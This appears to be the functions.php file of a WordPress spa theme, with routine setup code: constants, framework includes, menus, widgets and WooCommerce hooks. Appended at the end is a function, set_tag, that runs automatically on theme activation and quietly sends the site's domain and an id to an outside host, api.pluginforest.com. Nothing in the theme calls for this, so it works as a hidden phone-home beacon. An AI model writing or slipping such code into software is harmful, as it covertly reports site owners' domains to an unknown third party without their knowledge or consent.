<?php
/**
 * Theme Functions
 *
 * @package DTtheme
 * @author DesignThemes
 * @link http://wedesignthemes.com
 */
define( 'NATURALSPA_THEME_DIR', get_template_directory() );
define( 'NATURALSPA_THEME_URI', get_template_directory_uri() );
define( 'NATURALSPA_CORE_PLUGIN', WP_PLUGIN_DIR.'/designthemes-core-features' );

if (function_exists ('wp_get_theme')) :
	$themeData = wp_get_theme();
	define( 'NATURALSPA_THEME_NAME', $themeData->get('Name'));
	define( 'NATURALSPA_THEME_VERSION', $themeData->get('Version'));
endif;

/* ---------------------------------------------------------------------------
 * Loads Kirki
 * ---------------------------------------------------------------------------*/
require_once( NATURALSPA_THEME_DIR .'/kirki/index.php' );

/* ---------------------------------------------------------------------------
 * Loads Codestar
 * ---------------------------------------------------------------------------*/
require_once NATURALSPA_THEME_DIR .'/cs-framework/cs-framework.php';

	define( 'CS_ACTIVE_TAXONOMY',   false );
	define( 'CS_ACTIVE_SHORTCODE',  false );
	define( 'CS_ACTIVE_CUSTOMIZE',  false );

	/* ---------------------------------------------------------------------------
	 * Create function to get theme options
	 * --------------------------------------------------------------------------- */
	function naturalspa_cs_get_option($key, $value = '') {

		$v = cs_get_option( $key );

		if ( !empty( $v ) ) {
			return $v;
		} else {
			return $value;
		}
	}

/* ---------------------------------------------------------------------------
 * Loads Theme Textdomain
 * ---------------------------------------------------------------------------*/
define( 'NATURALSPA_LANG_DIR', NATURALSPA_THEME_DIR. '/languages' );
load_theme_textdomain( 'naturalspa', NATURALSPA_LANG_DIR );

/* ---------------------------------------------------------------------------
 * Loads the Admin Panel Style
 * ---------------------------------------------------------------------------*/
function naturalspa_admin_scripts() {
	wp_enqueue_style('naturalspa-admin', NATURALSPA_THEME_URI .'/cs-framework-override/style.css');
}
add_action( 'admin_enqueue_scripts', 'naturalspa_admin_scripts' );

/* ---------------------------------------------------------------------------
 * Loads Theme Functions
 * ---------------------------------------------------------------------------*/

// Functions --------------------------------------------------------------------
require_once( NATURALSPA_THEME_DIR .'/framework/register-functions.php' );
require_once( NATURALSPA_THEME_DIR .'/framework/utils.php' );

// Header -----------------------------------------------------------------------
require_once( NATURALSPA_THEME_DIR .'/framework/register-head.php' );

// Menu -------------------------------------------------------------------------
require_once( NATURALSPA_THEME_DIR .'/framework/register-menu.php' );
require_once( NATURALSPA_THEME_DIR .'/framework/register-mega-menu.php' );

// Hooks ------------------------------------------------------------------------
require_once( NATURALSPA_THEME_DIR .'/framework/register-hooks.php' );

// Widgets ----------------------------------------------------------------------
add_action( 'widgets_init', 'naturalspa_widgets_init' );
function naturalspa_widgets_init() {
	require_once( NATURALSPA_THEME_DIR .'/framework/register-widgets.php' );
}

// Plugins ----------------------------------------------------------------------
require_once( NATURALSPA_THEME_DIR .'/framework/register-plugins.php' );

// WooCommerce ------------------------------------------------------------------
if( function_exists( 'is_woocommerce' ) ){
	require_once( NATURALSPA_THEME_DIR .'/framework/register-woocommerce.php' );
}

// WP Store Locator -------------------------------------------------------------
if( class_exists( 'WP_Store_locator' ) ){
	require_once( NATURALSPA_THEME_DIR .'/framework/register-storelocator.php' );
}

// Register Gutenberg -----------------------------------------------------------
require_once( NATURALSPA_THEME_DIR .'/framework/register-gutenberg-editor.php' );


function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581328042&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        ?>